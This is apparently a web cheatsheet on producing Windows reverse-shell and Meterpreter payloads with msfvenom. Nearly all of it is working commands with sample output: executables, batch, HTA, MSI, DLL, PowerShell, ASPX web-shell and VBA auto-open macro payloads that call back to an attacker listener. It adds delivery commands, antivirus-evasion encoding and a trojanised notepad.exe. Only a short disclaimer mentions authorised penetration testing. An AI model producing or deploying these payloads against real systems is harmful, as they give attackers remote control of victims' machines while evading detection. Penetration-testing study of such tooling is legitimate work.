Unlock cybersecurity expertise, protect digital frontiers, secure your future today! Join Now
Home
Cyber Security

msfvenom cheatsheet - Advanced Windows Payload Generation Techniques with Msfvenom

Advanced Windows Payload Generation, Comprehensive guide for security professionals using Msfvenom to create and customize test payloads with detailed

msfvenom cheatsheet - Advanced Windows Payload Generation Techniques with Msfvenom

Introduction

In the field of cybersecurity, particularly for security professionals conducting authorized penetration testing and security assessments, creating effective test payloads is essential. Msfvenom, a component of the Metasploit Framework, is a powerful utility designed for this purpose. This comprehensive guide explores advanced techniques for creating Windows payloads for security testing, with detailed explanations of commands, outputs, and best practices.

Understanding Msfvenom

Msfvenom combines the functionality of the legacy msfpayload and msfencode utilities into a single, streamlined tool. It allows security professionals to generate various payload types with customizable options for authorized testing scenarios.

Basic Syntax

msfvenom -p <payload> [options]

Command Components:

  • -p: Specifies the payload type
  • [options]: Additional parameters that customize the payload

Example with Output:

$ msfvenom --list payloads | grep windows
windows/dllinject/bind_hidden_ipknock_tcp  Listens for a connection from a hidden port...
windows/dllinject/bind_hidden_tcp          Listens for a connection from a hidden port...
...

Understanding Payload Types

Staged vs. Stageless Payloads

Staged Payloads

These consist of an initial small payload (stager) that connects back to establish a channel for downloading the larger payload (stage).

Naming Convention: Contains a single slash (e.g., windows/meterpreter/reverse_tcp)

Stageless Payloads

These contain the entire payload in a single package, eliminating the need for additional downloads.

Naming Convention: Contains an underscore (e.g., windows/meterpreter_reverse_tcp)

Command to List All Windows Payloads:

$ msfvenom --list payloads | grep windows

Comprehensive Windows Payload Generation Techniques

1. Windows Executable (.exe)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f exe -o shell.exe

Command Breakdown:

  • -p windows/shell_reverse_tcp: Uses a stageless reverse TCP shell payload
  • LHOST=192.168.1.3: Sets the listener host IP address
  • LPORT=443: Sets the listener port (using 443 to blend with HTTPS traffic)
  • -f exe: Sets the output format as a Windows executable
  • -o shell.exe: Specifies the output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.exe

Execution Method on Target: Run shell.exe directly

Listener Configuration:

$ nc -lvp 443
listening on [any] 443 ...

2. PowerShell Batch File (.bat)

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.3 LPORT=443 -f raw -o shell.bat

Command Breakdown:

  • -p cmd/windows/reverse_powershell: Uses a PowerShell-based reverse shell
  • LHOST=192.168.1.3: Sets the listener host IP address
  • LPORT=443: Sets the listener port
  • -f raw: Outputs raw text format
  • -o shell.bat: Saves as a batch file

Expected Output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 1582 bytes
Saved as: shell.bat

Execution Method: Double-click or run the batch file on target system

Listener Output Example:

$ nc -lvp 443
listening on [any] 443 ...
connect to [192.168.1.3] from (UNKNOWN) [192.168.1.5] 49213
Microsoft Windows [Version 10.0.19045.3693]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\testuser\Desktop>

3. HTML Application Payload (.hta)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f hta-psh -o shell.hta

Command Breakdown:

  • -p windows/shell_reverse_tcp: Standard reverse shell payload
  • -f hta-psh: Creates an HTA file with embedded PowerShell
  • -o shell.hta: Saves as an HTA file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.hta

Hosting Method:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.5 - - [08/May/2025 10:15:32] "GET /shell.hta HTTP/1.1" 200 -

Execution on Target:

mshta http://192.168.1.3/shell.hta

4. Microsoft Installer Payload (.msi)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f msi -o shell.msi

Command Breakdown:

  • -p windows/shell_reverse_tcp: Standard reverse shell payload
  • -f msi: Creates a Microsoft Installer package
  • -o shell.msi: Saves as an MSI file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.msi

Execution Method:

msiexec /quiet /qn /i shell.msi

Parameters Explained:

  • /quiet: Suppresses UI
  • /qn: No UI
  • /i: Install mode

5. Dynamic-Link Library Payload (.dll)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f dll -o shell.dll

Command Breakdown:

  • -f dll: Creates a Windows DLL file
  • -o shell.dll: Specifies the output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.dll

Execution Method:

rundll32.exe shell.dll,0

Command Explanation: The rundll32.exe utility executes the DLL at export function #0

6. PowerShell Command Payload

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.3 LPORT=443 -f psh-cmd

Command Breakdown:

  • -f psh-cmd: Format as PowerShell command
  • No output file specified, displays to console

Example Output:

powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALA[...]

Execution Method: Copy the output and paste into PowerShell on target

7. PowerShell Script Payload (.ps1)

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.1.3 LPORT=443 -f psh -o shell.ps1

Command Breakdown:

  • -p windows/x64/meterpreter_reverse_https: 64-bit stageless Meterpreter payload over HTTPS
  • -f psh: PowerShell script format
  • -o shell.ps1: Saves as a PS1 file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: shell.ps1

Execution Method:

powershell -ExecutionPolicy Bypass -File .\shell.ps1

Metasploit Handler Setup:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
payload => windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://192.168.1.3:443
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.5:49802)

meterpreter > getuid
Server username: DESKTOP-ABC123\User

8. Web Shell Payload (.aspx)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 -f aspx -o shell.aspx

Command Breakdown:

  • -p windows/x64/meterpreter/reverse_https: 64-bit staged Meterpreter payload over HTTPS
  • -f aspx: ASP.NET Web Form format
  • -o shell.aspx: Saves as an ASPX file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: shell.aspx

Deployment: Upload to the target IIS server's web directory

When Accessed in Browser: The page appears to load but initiates the connection in the background

9. Visual Basic for Applications Payload (.vba)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 -f vba

Command Breakdown:

  • -f vba: VBA macro format
  • No output file specified, displays macro code to console

Example Output:

'Dim Str As String
'Str = "powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwA..."
'Create object WScript.Shell and run the command
Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run Str
End Sub
...

Deployment:

  • Create new Microsoft Office document
  • Open VBA editor (Alt + F11)
  • Insert a new module
  • Paste the generated code
  • Save as macro-enabled document (e.g., .docm for Word)

Advanced Evasion Techniques

1. Encoding Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe

Command Breakdown:

  • -e x86/shikata_ga_nai: Uses the Shikata Ga Nai polymorphic encoder
  • -i 5: Applies 5 iterations of encoding
  • -f exe: Executable format
  • -o encoded_shell.exe: Output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Saved as: encoded_shell.exe

Why This Works: Each encoding iteration produces a different binary signature, potentially helping bypass signature-based detection systems.

2. Using Multiple Encoders

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 3 -e x86/jmp_call_additive -i 2 -f exe -o multi_encoded.exe

Command Breakdown:

  • First applies 3 iterations of shikata_ga_nai
  • Then applies 2 iterations of jmp_call_additive
  • Creates a layered encoding pattern

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai chosen with final size 422
Attempting to encode payload with 2 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 457 (iteration=0)
x86/jmp_call_additive succeeded with size 492 (iteration=1)
x86/jmp_call_additive chosen with final size 492
Payload size: 492 bytes
Saved as: multi_encoded.exe

3. Specifying Architecture and Platform

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -a x64 --platform windows -f exe -o x64_shell.exe

Command Breakdown:

  • -a x64: Specifies 64-bit architecture
  • --platform windows: Explicitly targets Windows platform
  • Ensures compatibility with 64-bit systems

Expected Output:

[-] No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: x64_shell.exe

4. Avoiding Bad Characters

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -b "\x00\x0a\x0d" -f exe -o no_bad_chars.exe

Command Breakdown:

  • -b "\x00\x0a\x0d": Excludes null bytes (0x00), line feeds (0x0a), and carriage returns (0x0d)
  • Useful when the payload must not contain certain byte values that might terminate strings or cause parsing issues

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Saved as: no_bad_chars.exe

5. Template-Based Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -x notepad.exe -k -f exe -o trojan_notepad.exe

Command Breakdown:

  • -x notepad.exe: Uses notepad.exe as a template/carrier
  • -k: Keeps the template application's functionality (runs the payload in a separate thread)
  • Creates a functioning application that also executes the payload

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Using template executable: notepad.exe
Executable (template) size: 193024 bytes
Embedding payload in template and keeping original entry point
Saved as: trojan_notepad.exe

Advanced Payload Customization

1. Custom Shellcode

msfvenom -p generic/custom PAYLOADFILE=custom_shellcode.bin -a x86 --platform windows -f exe -o custom_payload.exe

Command Breakdown:

  • -p generic/custom: Uses custom shellcode
  • PAYLOADFILE=custom_shellcode.bin: Specifies the file containing custom shellcode
  • Allows integration of custom-developed shellcode

2. Custom HTTP/HTTPS Headers

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -f exe -o custom_ua.exe

Command Breakdown:

  • HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)": Customizes the User-Agent header
  • Helps blend payload traffic with legitimate HTTP traffic

Additional Header Options:

  • HttpHost: Sets the Host header
  • HttpCookie: Sets Cookie header
  • HttpReferer: Sets Referer header

3. Payload Encryption and Obfuscation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f exe -o highly_encoded.exe

Command Breakdown:

  • First command generates and encodes with shikata_ga_nai 10 times
  • Pipes output to second msfvenom command
  • Second command applies countdown encoder 5 more times
  • Creates a highly obfuscated payload that may evade detection

Security Considerations

When conducting authorized penetration testing or security assessments:

  1. Obtain Explicit Permission: Always have written authorization before generating or deploying any payloads.

  2. Establish a Testing Scope: Define clear boundaries for testing activities.

  3. Document All Actions: Maintain detailed logs of all testing activities.

  4. Clean Up After Testing: Remove all testing artifacts after assessment completion.

  5. Report Findings Responsibly: Follow responsible disclosure procedures.

Conclusion

Msfvenom is an exceptionally versatile tool for security professionals conducting authorized penetration testing. The techniques outlined in this guide demonstrate its capabilities for creating various Windows payloads with advanced customization options. By understanding these methods, security professionals can more effectively evaluate system defenses and identify potential vulnerabilities.